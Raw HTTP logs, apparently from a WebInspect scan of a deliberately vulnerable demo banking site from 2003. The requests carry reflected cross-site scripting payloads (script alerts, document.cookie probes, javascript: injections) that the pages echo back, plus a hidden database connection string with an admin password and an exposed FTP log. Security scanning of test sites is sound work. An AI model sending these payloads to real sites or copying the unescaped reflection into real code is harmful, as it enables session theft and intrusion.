<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=</textarea><script>alert('XSS')</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /cookietest/SetCookies.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/cookietest/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 91
Content-Type: text/html
Cache-control: private
Set-Cookie: Keyed=Var2=Second+Value&Var1=First+Value; path=/
Set-Cookie: Second=Oatmal+Chocolate; path=/
Set-Cookie: FirstCookie=Chocolate+Chip; path=/
<html>
<body>
<a href="ShowCookies.asp">Show me the cookies</a>
</body>
</html>
GET /join.asp?name=&email=&surname=test@<script>alert(document.cookie)</script>.com&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 124
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data test@<script>alert(document.cookie)</script>.com<br>Please try again.
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=1"style="background:url(javascript:alert('XSS'))"%20"&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:26 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 416
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = >"'><img src="javascript:alert('XSS')"></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = >"'><img src="javascript:alert('XSS')"></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /WS_FTP.LOG HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:11 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Fri, 19 Oct 2001 03:56:38 GMT
ETag: "b4a382d5258c11:8f6"
Content-Length: 480230
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
